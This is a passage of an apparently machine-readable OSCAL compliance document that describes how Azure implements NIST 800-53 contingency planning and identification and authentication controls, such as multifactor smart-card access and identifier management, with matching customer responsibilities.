Common practice at Microsoft is to replicate the transaction log to multiple assets and replay it to keep hot standby secondary databases on those assets up to date. This mechanism is referred to as Always On. Always On maintains multiple copies of a single database that reside on different server instances in different locations. One server instance serves the database to clients (the primary server). The other instance acts as a hot or warm standby server. In the event of a disaster, a failover quickly brings the standby copy of the database online (without data loss). For an overview of SQL Server Always On, please refer to <https://msdn.microsoft.com/en-us/library/ff877884.aspx>. Therefore, this is an alternative to transaction journaling because it provides the means to support contingency events. Also, per Microsoft \"10.01 Business Continuity Management Standard\", transaction recovery plans are required and managed by the different business groups to ensure the continuation of business processes in the event of an interruption."}],"responsibilities":[{"uuid":"55f64258-6f47-4918-9087-d016d3a79496","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-058"}],"description":"The customer is responsible for implementing transaction-based (e.g., transaction rollback, transaction journaling) recovery within customer-deployed resources. 
Note: if the customer configures Microsoft Azure backup and/or alternate site processing services appropriately, Azure can support the continued operation of customer-deployed resources.","provided-uuid":"eb27c1db-5bac-412d-a84c-58731e4c8758"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a1c0ed6e-dcaa-4952-a59a-17229e7246a1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-10.4","statements":[{"uuid":"9ed83edf-4f5d-43b6-aaf2-772f6e5dccba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-059"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-10.4_smt","by-components":[{"uuid":"552aa605-ba43-4a05-91e8-10d5cf021164","export":{"provided":[{"uuid":"2a39640b-04ae-4be3-af85-d8243ad742d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-059"}],"description":"If all datacenters for an Azure service experience failure, or if Microsoft were to resume processing at a disrupted site, Microsoft uses the following to recover Azure services in other Azure datacenters to the last known state:\n\n* Defined images and current OS, network device, and application baselines\n* Defined security processes around access control, change management, mandatory configuration settings, and encryption mechanisms\n\nRedeployment as part of system restoration follows the same process with the same authentication requirements as initial deployment as part of configuration 
management.\n\nAzure does not establish separate recovery times for individual datacenter components due to the design and function of datacenters. Azure datacenters are designed to be redundant by hosting services in datacenters that are geographically separated from each other. Services are mirrored in geographically redundant datacenters; all sites are active. Therefore, the risk to the security of the Azure environment due to failure of individual components is mitigated through availability of the information system.\n\nIf necessary to support the resumption of a service according to established disaster recovery plans, individual system components are replaced in support of the service Recovery Time Objective (RTO). The Azure spares policy ensures that spare components are available if replacement is needed."}],"responsibilities":[{"uuid":"5e65fe83-c2d8-467e-ae8e-5e73ef0da47a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-059"}],"description":"The customer is responsible for restoring customer-deployed resources to a configuration-controlled and integrity-protected known, operational state. 
Azure can support the continued operation of customer-deployed resources if the customer configures Microsoft Azure backup and/or alternate site processing services appropriately.","provided-uuid":"2a39640b-04ae-4be3-af85-d8243ad742d7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"59ac938c-928a-46f0-91af-72351d69b256","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2","statements":[{"uuid":"cf52a1c3-a1c6-4889-ae3a-b86d69348644","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2_smt","by-components":[{"uuid":"8290a5ea-d78d-4243-8362-2e16ca0ed835","export":{"provided":[{"uuid":"110dd138-933d-4630-ac36-c1337f3b26e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-006"}],"description":"Azure uniquely identifies and authenticates users via Active Directory (AD) and smart cards. AD associates users to IDs and GUIDs and prevents the creation of a duplicate account. A user's account within each Azure domain maps his or her Microsoft corporate network (CorpNet) identifier, known as an alias, to the Azure domain for identification and authentication.\n\nAzure utilizes the Global Management Environment (GME) and Azure Management Environment (AME) domains for access to the Azure environment. 
Each domain is specific to the environment.\n\nAs an example, John Doe's alias is jdoe, with accounts jdoe@redmond.gbl for access to CorpNet and jdoe@ame.gbl for access to Azure Commercial.\n\nJumpboxes, Debug servers, Network Hop Boxes, and the SSL VPN are the approved mechanisms by which to gain access to Azure assets via internal network connectivity from CorpNet. A user authenticates to the Jumpbox, Debug server, Network Hop Box, or the SSL VPN with his or her smart card and PIN, then authenticates to the destination asset, with an approved JIT request necessary for elevated access."}],"responsibilities":[{"uuid":"f82bc03b-3958-4c50-8e23-132c6b11c9e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-006"}],"description":"The customer is responsible for uniquely identifying and authenticating organizational users. Federal user entities are responsible for properly identifying and authenticating federal users via ADFS.","provided-uuid":"110dd138-933d-4630-ac36-c1337f3b26e4"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7185cde1-29a6-40b6-9643-8ce143432cb4","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.1","statements":[{"uuid":"371e4804-9e7b-4022-a772-544ea2f871aa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2.1_smt","by-components":[{"uuid":"66629711-d15d-419c-a887-23d908527816","export":{"provided":[{"uuid":"8c0b88fe-7eea-453d-94b3-5437e6aae893","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-007"}],"description":"Azure implements multifactor authentication through the use of smart card and PIN logons at entry points to the production assets."}],"responsibilities":[{"uuid":"f394bdb9-1e6a-4d72-a51e-fb5410fff9f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-007"}],"description":"The customer is responsible for implementing multifactor authentication for network access to privileged accounts.","provided-uuid":"8c0b88fe-7eea-453d-94b3-5437e6aae893"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"002c12b4-2b1e-4ab0-a53c-f700f4f10067","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.2","statements":[{"uuid":"75a52acd-dd04-4ca7-91cc-fbabedffe878","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2.2_smt","by-components":[{"uuid":"832706ef-209f-4ee7-8e14-ffbec9c01dc3","export":{"provided":[{"uuid":"3c749d25-7eb8-4600-9abe-ee685ee0b9d6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-008"}],"description":"Azure implements multifactor authentication through the use of smart card and PIN logons at entry points to the production assets."}],"responsibilities":[{"uuid":"30aa2236-96ca-4cd3-8966-d7524bf6b909","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-008"}],"description":"The customer is responsible for implementing multifactor authentication for network access to non-privileged accounts.","provided-uuid":"3c749d25-7eb8-4600-9abe-ee685ee0b9d6"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e2773a8a-85e8-4718-95ad-3f2cc5cd2d8c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.5","statements":[{"uuid":"78a4556f-3eee-487c-821f-e065e170f54e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-009"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-2.5_smt","by-components":[{"uuid":"fd0b4144-b287-4635-988c-c5d3b19eb4f4","export":{"provided":[{"uuid":"44e2ca47-cc56-45d9-b4ec-80b9ac4dc115","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-009"}],"description":"Group or shared accounts are not utilized within Azure unless necessary, such as where the local account or accounts cannot be deleted or disabled, or are necessary for emergency access. For accounts tracked as approved exceptions, the credentials for these accounts are stored in an approved secret management store, which tracks and monitors access to secrets and ensures group or shared account usage is uniquely attributable to the user accessing it by associating the secret store logs with the group or shared account usage. 
When a user accesses the credentials in the secret management store, that user is identified uniquely, ensuring non-repudiation and attributing user activity to the shared account."}],"responsibilities":[{"uuid":"eb271d32-2f07-45b2-b55b-0451fac40073","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-009"}],"description":"The customer is responsible for requiring individuals using group authenticators to first authenticate using individual authenticators.","provided-uuid":"44e2ca47-cc56-45d9-b4ec-80b9ac4dc115"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f7fc4c52-a50d-4d02-aedc-4e9b866f13c3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.6","statements":[{"uuid":"ef5e88f1-befc-4c39-a7bf-27c0556c7c2b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2.6_smt","by-components":[{"uuid":"109501f6-225d-4ac0-8145-a8b5fc2ee5e9","export":{"provided":[{"uuid":"fb87be54-2df2-4bb4-b298-5abbb214449a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-010"}],"description":"Azure implements multifactor authentication for access to privileged and non-privileged accounts through the use of Thales and Idemia smart cards and Yubico Yubikeys. 
Access requires the user to present a certificate bound to the card or key along with a PIN."}],"responsibilities":[{"uuid":"ea848790-0328-4f5a-9cbd-1c77049cc39b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-010"}],"description":"The customer is responsible for implementing multifactor authentication for access to accounts such that one of the factors is provided by a device separate from the system gaining access and the device meets defined strength of mechanism requirements.","provided-uuid":"fb87be54-2df2-4bb4-b298-5abbb214449a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6aad4cf5-b64a-438c-8550-e20624efdd03","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.8","statements":[{"uuid":"2c4e64e8-c63e-4d14-81a3-21f0d590e21f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-2.8_smt","by-components":[{"uuid":"e500a390-3847-4a58-9830-8972a1244a35","export":{"provided":[{"uuid":"29d93637-f798-4709-b700-65b22f55d8b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-011"}],"description":"Azure implements multifactor authentication for network access by Azure personnel with eAuth Level 4 and FIPS 140-2 compliant Thales smart cards. All Microsoft users connect to Azure assets via Jumpboxes, Debug servers, and Network Hop Boxes. 
This requires the user to present a certificate bound to the card along with a PIN.\n\nAccess to the Azure production environment using the smart card solution is protected from replay attacks by the built-in Kerberos v5 functionality of Active Directory (AD). In Kerberos authentication, the authenticator sent by the client contains additional data, such as an encrypted IP list, the client's timestamp, and the ticket lifetime. If a packet is replayed, the timestamp is checked. If the timestamp is earlier than or the same as a previous authenticator, the packet is rejected because it is a replay.\n\nFor more information on Active Directory and Kerberos, see TechNet article 742516: <https://technet.microsoft.com/en-us/library/bb742516.aspx>\n\nTechniques used to address replay attacks from network connections to the Azure environment include the use of the TLS protocol that uses challenges. The TLS protocol is used to authenticate network access to prove the identities of parties engaged in secure communication. It also provides data integrity through an integrity check value. 
In addition to protecting against data disclosure, the TLS security protocol can be used to help protect against masquerade attacks, man-in-the-middle or bucket brigade attacks, rollback attacks, and replay attacks."}],"responsibilities":[{"uuid":"5f46f83d-5858-4527-9551-4b1d50ca649e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-011"}],"description":"The customer is responsible for implementing replay-resistant authentication mechanisms for network access to privileged accounts.","provided-uuid":"29d93637-f798-4709-b700-65b22f55d8b8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4eb8b169-8985-4c24-8820-f4a9d0966dc1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-2.12","statements":[{"uuid":"d94f3aa3-1b9e-4aa6-afeb-afa02a64501c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-012"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-2.12_smt","by-components":[{"uuid":"9d0795c7-382b-45f3-82bc-0093eb743684","export":{"provided":[{"uuid":"a3b211e2-3173-42ca-9af7-fdf73aa2cfc0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-012"}],"description":"Azure does not utilize Personal Identity Verification (PIV) credentials for internal personnel because PIV cards are not available to Azure."}],"responsibilities":[{"uuid":"67abee64-6d32-4e7a-8f68-48f76732f9ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-012"}],"description":"Government 
customers using ADFS are responsible for accepting and electronically verifying Personal Identity Verification (PIV) credentials for government customer users.","provided-uuid":"a3b211e2-3173-42ca-9af7-fdf73aa2cfc0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3625b445-dc50-4a00-8499-93e0073ac9c1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-3","statements":[{"uuid":"9240d004-930e-459b-afa9-9957bbcc483c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-3_smt","by-components":[{"uuid":"7e4d836e-6aa8-4ce4-bfd1-0562f25dd645","export":{"provided":[{"uuid":"3f0068fe-6462-4126-91cc-6cfc1162baf9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-013"}],"description":"Azure identifies and authenticates network devices and servers, both physical and virtual.\n\nServers\n\nAll Azure physical server name resolution is performed through DNS addresses. Subnets used for the physical server environment use IP addresses provisioned from RFC 1918 non-publicly routable address space. Physical servers are identified and tracked using Datacenter Manager (DCM).\n\nWhen establishing an Azure subscription, a subscription ID is created. 
The Fabric Controller (FC), which manages all VMs in Azure, uses this subscription ID to tie VMs to specific subscriptions.\n\nDevices on the Azure environment authenticate with unique identifiers in the form of static MAC addresses and certificates. A physical asset or VM obtains an IP address over the network when it initially boots up. The Fabric DHCP Server is responsible for assigning IP addresses to physical assets and VMs as determined by the Fabric Controller. This allows the Fabric Controller to take control of managing the IP address pools for the set of physical assets. IPFilter on the operating system (RDOS) is programmed via the Fabric to only allow traffic from specific MAC addresses and specific DIPs, to counter ARP spoofing.\n\nNetwork Devices\n\nAs part of the network discovery and configuration steps in the bootstrap workflow, network devices are pre-configured to use DHCP/PXE boot for their configuration. Upon boot of the network device, the bootstrap agent provides the OS image for the device and the basic configuration, including the IP address and credentials, before establishing the connection to the environment."}],"responsibilities":[{"uuid":"e00ec96e-cdcc-4fbe-a5e4-1faf52709fb5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-013"}],"description":"The customer is responsible for implementing device identification and authentication prior to establishing a connection.","provided-uuid":"3f0068fe-6462-4126-91cc-6cfc1162baf9"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0a94bc5e-2873-42ea-8210-65c2037e01d1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-4","statements":[{"uuid":"8f6bb818-de4e-4e54-a0f5-0802bd7a087b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4_smt.a","by-components":[{"uuid":"d254dfd7-6d1d-4dd6-bfe3-066b3c48fb9c","export":{"provided":[{"uuid":"b0b52f4d-093a-4413-ba84-9e1730c7b08e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-014"}],"description":"Microsoft implements the identifier management control through the effective use of the corporate network (CorpNet) AD-based user authorization procedures. Microsoft establishes unique identifiers for each user through unique user IDs, based on HR personnel ID numbers. These CorpNet identifiers, known as aliases, are distributed to all Microsoft personnel during the initial CorpNet account creation process.\n\nFor personnel supporting Azure services, a user account within each Azure domain ties to the user's CorpNet account using his or her unique CorpNet alias. This alias is consistent across all of a user's accounts in all Microsoft domains, including Azure. CorpNet and Azure access are provisioned and managed using separate account management tools. 
Azure utilizes OneIdentity for both identifier and security group management.\n\nAzure utilizes the Global Management Environment (GME) and Azure Management Environment (AME) domains for access to the Azure environment. Each domain is specific to the environment.\n\nAs an example, John Doe's alias is jdoe, with accounts jdoe@redmond.gbl for access to CorpNet and jdoe@ame.gbl for access to Azure Commercial.\n\nDevice identifiers are authorized by service team users when adding new devices to the network, consistent with configuration management and inventory management procedures."}],"responsibilities":[{"uuid":"5f568855-948c-43f9-9bb8-4facef586509","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-014"}],"description":"The customer is responsible for managing identifiers (i.e., individuals, groups, roles, and devices) for customer resources by receiving authorization from customer-defined personnel/roles prior to assigning identifiers. **Customer Identity Federation** Agency customers create their user accounts via the Microsoft Azure Management Portal. The portal is the entry point for all Microsoft Azure subscribers. Accounts are automatically created when the service is subscribed. Microsoft Azure Management Portal user identifiers are defined by the customer. 
The customer agency is responsible for obtaining authorization from agency organizational officials for access by agency users and ensuring the correct identifier is assigned to the correct agency employee for access to Microsoft Azure via the Microsoft Azure Management Portal and agency enablers.","provided-uuid":"b0b52f4d-093a-4413-ba84-9e1730c7b08e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c929a1f2-9255-4074-b7c0-7861fc8b76e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4_smt.b","by-components":[{"uuid":"f6fe4e77-80c4-44b5-b695-53caca76e566","export":{"provided":[{"uuid":"3a88fa34-237d-4c90-949c-534544351413","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-015"}],"description":"Azure identifies users using the account identifier derived from their Microsoft CorpNet alias as described above. 
These unique identifiers are not reused for two (2) years.\n\nDevice identifiers are selected by service team users when adding new devices to the network, consistent with configuration management and inventory management procedures.\n\nActive Directory is the central account repository used to provide access."}],"responsibilities":[{"uuid":"3d715cdf-df6c-45f8-bbd0-584a6ab57058","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-015"}],"description":"The customer is responsible for selecting identifiers (i.e., individuals, groups, roles, and devices) for customer resources. **Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for selecting and assigning federal/customer user identifiers through their Active Directory management structure which carries over to AAD through the ADFS Federation. These authentication requests include a claims-based response with group access allowing the unique user to be mapped to the directory synchronized copy of the user in AAD.","provided-uuid":"3a88fa34-237d-4c90-949c-534544351413"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ca278114-5062-40b9-b9f3-4bc783f1735f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4_smt.c","by-components":[{"uuid":"27ec591c-3e5f-42eb-bbac-2d5205f3b37c","export":{"provided":[{"uuid":"da5caf93-aadf-4b66-ba7d-949d7d28d583","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-016"}],"description":"Active Directory (AD) is the central account repository used to provide access to the service environment.\n\nThe Human Resource database is the authoritative source for determining employment status for these AD accounts, as well as establishing the account display name or alias. When the account is created in AD, the unique identifier is created and assigned to the individual.\n\nWhen adding new devices to the network, service team users assign device identifiers consistent with configuration management and inventory management procedures."}],"responsibilities":[{"uuid":"3099fc93-ace8-490b-935e-a2ae38ed0755","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-016"}],"description":"The customer is responsible for assigning identifiers (i.e., individuals, groups, roles, and devices) for customer resources. 
**Customer Identity Federation** Federal user entities, as well as other customers using identity federation, are responsible for selecting and assigning federal/customer user identifiers through their Active Directory management structure which carries over to AAD through the ADFS Federation. These authentication requests include a claims-based response with group access allowing the unique user to be mapped to the directory synchronized copy of the user in AAD.","provided-uuid":"da5caf93-aadf-4b66-ba7d-949d7d28d583"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"52925ff1-c57c-41b7-a9a4-f1af55256332","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-017"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4_smt.d","by-components":[{"uuid":"46867fce-5918-46bd-a9ee-27fde821c01c","export":{"provided":[{"uuid":"a3913294-92db-47e1-a7ac-48db9b439393","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-017"}],"description":"Unique user and service or device identifiers are not reused for two (2) years. This is enforced by Active Directory (AD). For users, smart cards are device-unique token identifiers which are uniquely paired to individuals. Smart card certificates are paired to an individual's AD Security Identifier (SID). 
These unique account identifier and device pairs are not reused."}],"responsibilities":[{"uuid":"721c72b8-39c5-4b7b-b893-d19f3bcc9053","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-017"}],"description":"The customer is responsible for preventing identifier reuse for the customer-defined time period.","provided-uuid":"a3913294-92db-47e1-a7ac-48db9b439393"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"942278eb-8063-410d-9a4d-04ae8fb726c7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-4.4","statements":[{"uuid":"f6f8980d-870a-47ec-8e2f-5ce8376e7a35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-018"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-4.4_smt","by-components":[{"uuid":"9ce13240-2670-4203-92a1-ba070d2614ab","export":{"provided":[{"uuid":"f1321cb6-8af2-40a5-8553-e6b7c72cab4c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-018"}],"description":"The status of all Microsoft personnel is recorded in OneIdentity, which is the authoritative system for controlling and authorizing account permissions within Azure. Additionally, contractors and vendors are denoted by a prefix, \"a-\" or \"v-\", respectively, associated with their unique AD credentials. 
Foreign nationals are not uniquely identified in this system as it is a multi-tenant system supporting commercial clients as well as government agencies. Microsoft maintains an operational requirement for this implementation."}],"responsibilities":[{"uuid":"7e31991a-3542-4819-940a-314eb3297064","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-018"}],"description":"The customer is responsible for identifying the status (e.g., contractor, foreign national) of individual users with unique identifiers.","provided-uuid":"f1321cb6-8af2-40a5-8553-e6b7c72cab4c"}]},"description":"See inheritance and customer responsibility 